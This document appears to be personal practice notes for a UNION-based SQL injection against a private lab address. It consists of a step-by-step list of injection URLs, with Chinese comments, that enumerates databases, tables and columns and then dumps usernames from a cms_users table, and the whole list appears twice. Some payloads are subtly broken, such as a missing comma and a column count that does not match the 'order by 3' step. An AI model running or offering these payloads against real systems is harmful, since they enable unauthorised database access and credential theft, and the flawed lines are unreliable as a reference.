http://192.168.88.130/show.php?id=33 '
http://192.168.88.130/show.php?id=33 and 1=1
http://192.168.88.130/show.php?id=33 order by 3#
http://192.168.88.130/show.php?id=33 union all select 1,2,database()
http://192.168.88.130/show.php?id=33 union all select 1,2,user()
#统计出有多少个数据库
http://192.168.88.130/show.php?id=33 union all select 1,2,count(*) from information_schema.SCHEMATA
#查询数据库
http://192.168.88.130/show.php?id=33 union all select 1,2,unhex(hex(schema_name)) from information_schema.SCHEMATA limit 0,2
#统计查询数据库有多少个表
http://192.168.88.130/show.php?id=33 union all select 1,2,count(*) from information_schema.tables where table_schema='sqldataname'
#查询库下面的表名
http://192.168.88.130/show.php?id=33 union all select 1,2,unhex(hex(table_name)) from information_schema.tables where table_schema='sqldataname' limit 0,2
#统计列名
http://192.168.88.130/show.php?id=33 union all select 1,2,count(*) from information_schema.columns where table_name='0x2323323' and table_schema='sqldataname' limit 0,2
#查询列名
http://192.168.88.130/show.php?id=33 union all select 1,2,unhex(hex(column_name)) from information_schema.columns where table_name='0x8989989' and table_schema='sqldataname' limit 0,2
#查询字段
http://192.168.88.130/show.php?id=33 union all select 1,2 unhex(hex(username)),4,5 from cms_users limit 0,1
http://192.168.88.130/show.php?id=33 and 1=1
http://192.168.88.130/show.php?id=33 order by 3#
http://192.168.88.130/show.php?id=33 union all select 1,2,database()
http://192.168.88.130/show.php?id=33 union all select 1,2,user()
#统计出有多少个数据库
http://192.168.88.130/show.php?id=33 union all select 1,2,count(*) from information_schema.SCHEMATA
#查询数据库
http://192.168.88.130/show.php?id=33 union all select 1,2,unhex(hex(schema_name)) from information_schema.SCHEMATA limit 0,2
#统计查询数据库有多少个表
http://192.168.88.130/show.php?id=33 union all select 1,2,count(*) from information_schema.tables where table_schema='sqldataname'
#查询库下面的表名
http://192.168.88.130/show.php?id=33 union all select 1,2,unhex(hex(table_name)) from information_schema.tables where table_schema='sqldataname' limit 0,2
#统计列名
http://192.168.88.130/show.php?id=33 union all select 1,2,count(*) from information_schema.columns where table_name='0x2323323' and table_schema='sqldataname' limit 0,2
#查询列名
http://192.168.88.130/show.php?id=33 union all select 1,2,unhex(hex(column_name)) from information_schema.columns where table_name='0x8989989' and table_schema='sqldataname' limit 0,2
#查询字段
http://192.168.88.130/show.php?id=33 union all select 1,2 unhex(hex(username)),4,5 from cms_users limit 0,1